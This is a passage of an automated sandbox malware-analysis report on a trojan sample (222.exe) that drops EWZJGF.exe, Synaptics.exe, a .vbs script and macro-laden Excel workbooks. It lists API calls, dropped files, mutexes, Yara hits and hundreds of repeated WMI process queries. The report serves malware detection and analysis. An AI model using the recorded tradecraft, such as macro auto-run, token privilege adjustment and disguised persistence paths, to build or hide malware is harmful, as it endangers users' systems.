                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_004AECBC
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_0045AD5C NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,9_2_0045AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_004AEFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_0045AFB4 GetParent,NtdllDialogWndProc_W,9_2_0045AFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF0A1 SendMessageW,NtdllDialogWndProc_W,9_2_004AF0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_004AF122
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF37C NtdllDialogWndProc_W,9_2_004AF37C
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF3DA NtdllDialogWndProc_W,9_2_004AF3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF3AB NtdllDialogWndProc_W,9_2_004AF3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF45A ClientToScreen,NtdllDialogWndProc_W,9_2_004AF45A
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF425 NtdllDialogWndProc_W,9_2_004AF425
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe, Code function: 9_2_004AF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_004AF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AF594 GetWindowLongW,NtdllDialogWndProc_W,9_2_004AF594
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045B7F2 NtdllDialogWndProc_W,9_2_0045B7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_0045B845 NtdllDialogWndProc_W,9_2_0045B845
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AFE80 NtdllDialogWndProc_W,9_2_004AFE80
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_004AFF04
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004AFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_004AFF91
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A702F: CreateFileW,DeviceIoControl,CloseHandle,2_2_007A702F
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74745590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_0079B9F1
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_007A82D0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_004882D0
                              Source: XJVR1Oh1.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: XJVR1Oh1.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NVWZAPQSQL.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NVWZAPQSQL.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: String function: 0077F885 appears 68 times
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: String function: 00787750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: String function: 0045F885 appears 68 times
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: String function: 00467750 appears 42 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496
                              Source: 222.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: 222.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX6FEC.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: 222.exe, 00000000.00000000.2014261512.00000000004A5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameb! vs 222.exe
                              Source: 222.exe, 00000000.00000003.2022654571.000000000071D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs 222.exe
                              Source: 222.exe, 00000000.00000003.2022654571.000000000071D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName>( vs 222.exe
                              Source: 222.exe, 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs 222.exe
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs 222.exe
                              Source: 222.exe Binary or memory string: OriginalFileName vs 222.exe
                              Source: 222.exe Binary or memory string: OriginalFilenameb! vs 222.exe
                              Source: 222.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@20/59@10/4
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007AD712 GetLastError,FormatMessageW,2_2_007AD712
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0079B8B0 AdjustTokenPrivileges,CloseHandle,2_2_0079B8B0
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0079BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_0079BEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0047B8B0 AdjustTokenPrivileges,CloseHandle,9_2_0047B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0047BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_0047BEC3
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007AEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_007AEA85
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007A6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_007A6F5B
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007AEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_007AEFCD
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007631F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_007631F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                              Source: C:\Users\user\Desktop\222.exe File created: C:\Users\user\Desktop\._cache_222.exe
                              Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6192
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
                              Source: C:\Users\user\Desktop\._cache_222.exe File created: C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                              Source: Yara match File source: 222.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.222.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCX6FEC.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_222.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                              Source: C:\Users\user\Desktop\222.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_222.exe'
